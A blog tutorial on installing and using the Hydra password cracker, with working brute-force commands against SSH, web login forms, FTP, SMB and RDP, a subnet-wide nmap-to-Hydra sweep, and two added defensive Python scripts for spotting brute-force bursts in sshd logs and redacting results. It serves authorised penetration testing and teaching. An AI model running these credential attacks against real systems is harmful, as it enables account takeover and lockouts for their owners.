thelinuxvault blog

How to Install and Use Hydra in Linux: A Comprehensive Guide

Hydra (officially THC-Hydra) is one of the most powerful, open-source password-cracking tools used by ethical hackers and penetration testers. It specializes in dictionary attacks and brute-force attacks against a wide range of network services—from SSH and FTP to web forms and RDP. While Hydra is often associated with "hacking," its legitimate use lies in testing the security of systems by identifying weak passwords (with explicit permission from the system owner).

This guide will walk you through:

  • Installing Hydra on major Linux distributions.
  • Understanding its core syntax and flags.
  • Running practical attacks (e.g., SSH, web forms).
  • Best practices for ethical and efficient use.
  • Troubleshooting common issues.

By the end, you’ll be able to use Hydra responsibly to assess the security of your own systems (or those you’re authorized to test).

2026-05

Table of Contents#

  1. What is Hydra?
    • Brute-Force vs. Dictionary Attacks
    • Legitimate Use Cases
  2. Pre-Installation Prerequisites
  3. Installing Hydra on Linux
    • Debian/Ubuntu
    • RHEL/CentOS/Fedora
    • Arch Linux
    • Compiling from Source
  4. Hydra’s Core Syntax and Flags
  5. Common Usage Examples
    • Example 1: Brute-Force SSH
    • Example 2: Brute-Force HTTP POST Forms
    • Example 3: Brute-Force FTP
    • Example 4: Brute-Force SMB (Windows File Sharing)
    • Example 5: Brute-Force RDP
  6. Best Practices for Hydra
  7. Troubleshooting Common Issues
  8. Advanced Hydra Techniques
  9. Ethical and Legal Considerations
  10. Conclusion
  11. References

What is Hydra?#

Hydra is a parallelized login cracker developed by the THC (The Hacker’s Choice) team. It supports over 50 protocols, including:

  • SSH, FTP, Telnet
  • HTTP/HTTPS (form-based, Basic Auth)
  • SMB, RDP, VNC
  • MySQL, PostgreSQL, MongoDB

Brute-Force vs. Dictionary Attacks#

Hydra excels at dictionary attacks (using precompiled lists of common passwords like rockyou.txt), but it can also perform brute-force attacks (trying every possible combination of characters—though this is slower and rarely practical).

Attack Type   How It Works                                                Use Case
Dictionary    Tests passwords from a list (e.g., 123456, password).       Most common; targets weak, reused passwords.
Brute-Force   Generates every possible password (e.g., a, b, ..., zzz).   Rare; only for short passwords (≤6 characters).

Legitimate Use Cases#

  • Penetration Testing: Verify if users are using weak passwords.
  • Security Audits: Test if systems enforce strong authentication policies.
  • Incident Response: Validate if credentials leaked in a breach are still active.

Pre-Installation Prerequisites#

Before installing Hydra:

  1. Obtain Written Consent: Unauthorized use of Hydra (or any hacking tool) is illegal in most countries. You must have explicit permission from the system owner.
  2. Use a Testing Environment: Never test Hydra on production systems—use a virtual machine (e.g., VirtualBox) or a dedicated lab.
  3. Update Your System: Ensure your Linux distro is up to date to avoid dependency issues.

Installing Hydra on Linux#

Hydra is available in most Linux package managers. Below are instructions for popular distributions:

1. Debian/Ubuntu-Based Distros (Kali, Mint, Pop!_OS)#

Kali Linux comes with Hydra pre-installed. For other Debian/Ubuntu systems:

sudo apt update
sudo apt install hydra

2. RHEL/CentOS/Fedora#

First, enable the EPEL (Extra Packages for Enterprise Linux) repository:

# RHEL/CentOS 8+
sudo dnf install epel-release
sudo dnf install hydra
 
# RHEL/CentOS 7
sudo yum install epel-release
sudo yum install hydra

3. Arch Linux/Manjaro#

Use pacman to install Hydra:

sudo pacman -S hydra

4. Compiling from Source (For Older Distros)#

If your distro doesn’t have Hydra in its repos, compile it from the official GitHub repo:

Step 1: Install Dependencies#

# Debian/Ubuntu
sudo apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncurses5-dev libgcrypt20-dev libgnutls28-dev
 
# RHEL/CentOS
sudo yum install openssl-devel libssh-devel libidn-devel pcre-devel gtk2-devel mysql-devel postgresql-devel subversion-devel firebird-devel ncurses-devel libgcrypt-devel gnutls-devel

Step 2: Download and Compile#

git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
sudo make install

Step 3: Verify Installation#

Run hydra -h to confirm Hydra is installed. You should see a help menu.

Hydra’s Core Syntax and Flags#

Hydra’s command structure is:

hydra [GLOBAL OPTIONS] [TARGET] [SERVICE-SPECIFIC OPTIONS]

Common Global Flags#

Use these flags to control Hydra’s behavior:

Flag        Purpose
-l <user>   Test a single username (e.g., -l admin).
-L <file>   Test a list of usernames (e.g., -L users.txt).
-p <pass>   Test a single password (e.g., -p password123).
-P <file>   Test a list of passwords (e.g., -P rockyou.txt).
-t <num>    Number of parallel threads (default: 16). Start with 5–10 to avoid overwhelming the target.
-s <port>   Use a custom port (e.g., -s 2222 for SSH on port 2222).
-o <file>   Save results to a file (e.g., -o results.txt).
-V          Verbose mode (shows each login attempt).
-f          Stop after the first successful login (saves time).
-w <sec>    Timeout for each connection (default: 3 seconds; e.g., -w 5 for slow targets).
-U          Show usage for a specific service (e.g., hydra -U ssh).

Service-Specific Options#

Each service (e.g., ssh, http-post-form) has unique options. Use -U to learn more:

hydra -U http-post-form

Common Hydra Usage Examples#

Let’s walk through practical examples for popular services. We’ll use the rockyou.txt password list (pre-installed on Kali Linux: /usr/share/wordlists/rockyou.txt.gz). To unzip it:

gunzip /usr/share/wordlists/rockyou.txt.gz

Example 1: Brute-Force SSH#

SSH is the most common target for Hydra. Let’s test if the user john has a weak password:

hydra -l john -P /usr/share/wordlists/rockyou.txt 192.168.1.10 ssh -V -t 10 -f

Breakdown:#

  • -l john: Test the username john.
  • -P rockyou.txt: Use the rockyou.txt password list.
  • 192.168.1.10: Target IP (replace with your lab VM’s IP).
  • ssh: Service to attack.
  • -V: Verbose output (see each attempt).
  • -t 10: Use 10 threads (balance speed and system load).
  • -f: Stop after the first successful login.

Expected Output:#

If a password is found:

[22][ssh] host: 192.168.1.10   login: john   password: iloveyou
1 of 1 target successfully completed, 1 valid password found
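The same run is visible from the defender's side: every guess lands in the target's sshd log as a "Failed password" line, a burst from one source IP, and a guessed password shows up as an "Accepted password" line right after that burst. As an added example, not part of the original post, this Python script reads constructed auth.log lines (host name, process ids and addresses are made up) and flags any source IP whose failures inside a sliding window reach a threshold, the same signal lockout and fail2ban-style tooling key on.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd lines in auth.log format (not a real capture).
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 lab sshd[2101]: Failed password for john from 192.168.1.50 port 40001 ssh2
Jan 10 12:00:01 lab sshd[2102]: Failed password for john from 192.168.1.50 port 40002 ssh2
Jan 10 12:00:02 lab sshd[2103]: Failed password for invalid user admin from 192.168.1.50 port 40003 ssh2
Jan 10 12:00:02 lab sshd[2104]: Failed password for john from 192.168.1.50 port 40004 ssh2
Jan 10 12:00:03 lab sshd[2105]: Failed password for john from 192.168.1.50 port 40005 ssh2
Jan 10 12:00:03 lab sshd[2106]: Accepted password for john from 192.168.1.50 port 40006 ssh2
Jan 10 12:05:00 lab sshd[2200]: Failed password for alice from 192.168.1.77 port 50001 ssh2
Jan 10 12:30:00 lab sshd[2300]: Failed password for alice from 192.168.1.77 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+")

def detect_bruteforce(log_text, threshold=5, window_sec=60):
    """Flag source IPs with >= threshold failed logins inside a sliding window.
    Returns {ip: {"failures": peak_in_window, "users": [...], "success_after": bool}}."""
    window = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                # unrelated syslog line
        # syslog timestamps carry no year; strptime's 1900 default is fine for deltas
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        ip = m["ip"]
        if m["result"] == "Failed":
            q = window[ip]
            q.append(ts)
            users[ip].add(m["user"])
            while (ts - q[0]).total_seconds() > window_sec:   # drop stale failures
                q.popleft()
            if len(q) >= threshold:
                prev = alerts.get(ip, {"failures": 0, "success_after": False})
                alerts[ip] = {"failures": max(len(q), prev["failures"]),
                              "users": sorted(users[ip]),
                              "success_after": prev["success_after"]}
        elif ip in alerts:
            # A success right after a burst of failures means a guessed password, not a typo
            alerts[ip]["success_after"] = True
    return alerts
```

Two failed logins from 192.168.1.77 half an hour apart never reach the threshold, which is the point of the window: a user mistyping a password is not a brute-force event.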

Example 2: Brute-Force HTTP POST Login Forms#

Web forms are trickier—you need to capture the form data and error message from the login page. Let’s attack a test site (http://192.168.1.10/login.php):

Step 1: Capture Form Data#

  1. Open the login page in Chrome/Firefox.
  2. Press F12 to open DevTools.
  3. Go to the Network tab.
  4. Submit the form with a wrong username/password (e.g., admin/wrong).
  5. Click the POST request (e.g., login.php).
  6. Copy the Form Data (e.g., username=admin&password=wrong).
  7. Copy the error message (e.g., Invalid credentials).

Step 2: Run Hydra#

Use the http-post-form module:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid credentials" -V -t 5 -f

Breakdown:#

  • /login.php: The URL where the form submits data (action URL).
  • username=^USER^&password=^PASS^: The form fields, with ^USER^ and ^PASS^ as Hydra’s placeholders; Hydra substitutes each username/password candidate into them.
  • Invalid credentials: The error message Hydra uses to detect failed logins.

Example 3: Brute-Force FTP#

FTP is unencrypted—use this example to test if an FTP server has weak credentials:

hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt 192.168.1.10 ftp -V -t 5

Example 4: Brute-Force SMB (Windows File Sharing)#

SMB is used for Windows file sharing. Test the administrator account:

hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.1.10 smb -V -t 3

Note:#

Windows systems often have account lockout policies (e.g., 5 failed attempts = lockout). Use -t 3 (fewer threads) to avoid locking accounts.


Example 5: Brute-Force RDP (Remote Desktop)#

RDP is used for Windows remote access. Test the admin user:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 rdp -V -t 1

Note:#

RDP is slow—use -t 1 (1 thread) to avoid timeouts.

Best Practices for Hydra#

  1. Start Small: Use a small password list (e.g., 100 passwords) to test your command before running a full attack.
  2. Check Account Lockout Policies: Ask the system owner if the target has lockout rules (e.g., 5 failed attempts = lockout).
  3. Use Custom Password Lists: Combine rockyou.txt with organization-specific terms (e.g., company name, product names) for better results.
  4. Avoid Overloading Targets: Use -t 5–10 threads—too many threads can crash the target (DoS).
  5. Log Everything: Use -o results.txt to document findings for your report.
  6. Update Hydra Regularly: New versions fix bugs and add support for more services.
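To act on practice 5 without pasting cleartext passwords into the report, here is an added example (my code, not from the Hydra project) that parses the -o output format shown in Example 1, masks each password behind a keyed tag, and groups accounts that share a password, since reuse across accounts is a finding in its own right. The sample results file and REPORT_KEY are constructed placeholders.

```python
import hmac
import re
from collections import defaultdict

# Constructed sample of a Hydra -o results file, in the line format shown in Example 1.
SAMPLE_RESULTS = """\
# Hydra v9 run at 2026-05-01 10:00:00 on 192.168.1.10 ssh (hydra -L users.txt -P pass.txt ...)
[22][ssh] host: 192.168.1.10   login: john   password: iloveyou
[22][ssh] host: 192.168.1.10   login: alice   password: Summer2024!
[21][ftp] host: 192.168.1.11   login: ftpuser   password: iloveyou
[445][smb] host: 192.168.1.12   login: administrator   password: Summer2024!
"""

# Placeholder per-engagement secret; keep it out of the report so tags are not reversible.
REPORT_KEY = b"replace-with-a-random-per-engagement-secret"

RESULT_RE = re.compile(r"^\[(?P<port>\d+)\]\[(?P<service>[\w-]+)\] host: (?P<host>\S+)"
                       r"\s+login: (?P<login>\S+)\s+password: (?P<password>.*)$")

def parse_results(text):
    """Parse Hydra result lines into dicts; the '#' header and anything else is skipped."""
    return [m.groupdict() for m in map(RESULT_RE.match, text.splitlines()) if m]

def redact(password):
    """Mask the cleartext; the keyed tag lets the same password be recognized later."""
    tag = hmac.new(REPORT_KEY, password.encode(), "sha256").hexdigest()[:8]
    return f"{'*' * len(password)} (len={len(password)}, tag={tag})"

def build_report(text):
    """List findings per host and flag passwords shared across accounts (reuse)."""
    findings = parse_results(text)
    by_password = defaultdict(list)
    for f in findings:
        by_password[f["password"]].append(f"{f['login']}@{f['host']}:{f['port']}/{f['service']}")
    reused = {p: a for p, a in by_password.items() if len(a) > 1}
    hosts = sorted({f["host"] for f in findings})
    lines = [f"{len(findings)} weak credential(s) on {len(hosts)} host(s)"]
    for f in findings:
        lines.append(f"  {f['host']}:{f['port']} {f['service']:<4} login={f['login']} "
                     f"password={redact(f['password'])}")
    for accounts in reused.values():
        lines.append(f"  REUSE: one password shared by {len(accounts)} accounts: {', '.join(accounts)}")
    return {"findings": findings, "reused": reused, "report": "\n".join(lines)}
```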

Troubleshooting Common Issues#

1. Connection Failures (Could not connect to target)#

  • Cause: Target is offline, firewall blocks the port, or service is not running.
  • Fix:
    • Ping the target: ping 192.168.1.10.
    • Check if the service is running: ss -tuln | grep 22 (for SSH).
    • Disable the target’s firewall (lab only): sudo ufw disable (Debian/Ubuntu) or sudo systemctl stop firewalld (RHEL/CentOS).

2. Authentication Errors (No valid passwords found)#

  • Cause: Password list is too small, username is incorrect, or target uses multi-factor authentication (MFA).
  • Fix:
    • Verify the username (e.g., john vs. John).
    • Use a larger password list (e.g., SecLists).
    • Check if MFA is enabled (Hydra can’t bypass MFA).

3. Slow Performance#

  • Cause: Too many threads, slow target, or network congestion.
  • Fix:
    • Reduce threads (e.g., -t 5 instead of -t 20).
    • Increase timeout (e.g., -w 5).

4. Module Not Found (No module for service 'rdp')#

  • Cause: Missing dependencies for the RDP module.
  • Fix: Install libfreerdp-dev (Debian/Ubuntu):
    sudo apt install libfreerdp-dev

Advanced Hydra Techniques#

1. Integrate with Nmap (Find Open Ports)#

Use Nmap to scan for open SSH ports, then pipe results to Hydra:

nmap -p 22 192.168.1.0/24 -oG - | grep open | awk '{print $2}' | xargs -I {} hydra -l john -P /usr/share/wordlists/rockyou.txt {} ssh -V -t 5

Breakdown:#

  • nmap -p 22 192.168.1.0/24: Scan the subnet for open SSH ports (port 22).
  • -oG -: Output results in "greppable" format.
  • grep open: Filter for hosts with open SSH ports.
  • awk '{print $2}': Extract the IP address from each line.
  • xargs hydra: Pass the IPs to Hydra for brute-forcing.

2. Use Password Rules (John the Ripper)#

John the Ripper can generate mutated password lists that you can then feed to Hydra. First, create a rules.txt file:

# Append a number (1-9)
$[0-9]
# Capitalize first letter
c

Generate a mutated password list using John:

john --wordlist=/usr/share/wordlists/rockyou.txt --rules=rules.txt --stdout > mutated_passwords.txt

Then use the generated list with Hydra:

hydra -l admin -P mutated_passwords.txt 192.168.1.10 ssh -V

3. Brute-Force Multiple Users and Passwords#

Test a list of users (users.txt) with a list of passwords (pass.txt):

hydra -L users.txt -P pass.txt 192.168.1.10 ssh -V -t 5

Ethical and Legal Considerations#

Hydra is a double-edged sword—it can secure systems or be used for cybercrime. Here’s what you must know:

  1. Laws: Unauthorized access violates:
    • CFAA (U.S.): Computer Fraud and Abuse Act.
    • GDPR (EU): Requires consent for data processing.
    • Cybercrime Act (Global): Most countries have laws against hacking.
  2. Consequences: Penalties include fines, jail time, and a permanent criminal record.
  3. Ethical Hacking Certifications: Get certified (e.g., OSCP, CEH) to prove your skills and credibility.
  4. Report Findings: If you find weak passwords, report them to the system owner immediately.

Conclusion#

Hydra is an essential tool for ethical hackers—but it must be used responsibly. This guide covered:

  • Installing Hydra on Linux.
  • Understanding its core syntax.
  • Running practical attacks (SSH, web forms, RDP).
  • Best practices and troubleshooting.
  • Ethical/legal rules.

Remember: With great power comes great responsibility. Always prioritize consent and security.

References#

  1. Hydra Official Repo: https://github.com/vanhauser-thc/thc-hydra
  2. Kali Linux Hydra Docs: https://www.kali.org/tools/hydra/
  3. SecLists (Password Lists): https://github.com/danielmiessler/SecLists
  4. OSCP Certification: https://www.offensive-security.com/pwk-oscp/
  5. Legal Guidelines: https://www.isc2.org/Certifications/CISSP (CISSP Ethics)

Let me know if you have questions—happy hacking (ethically)! 🛡️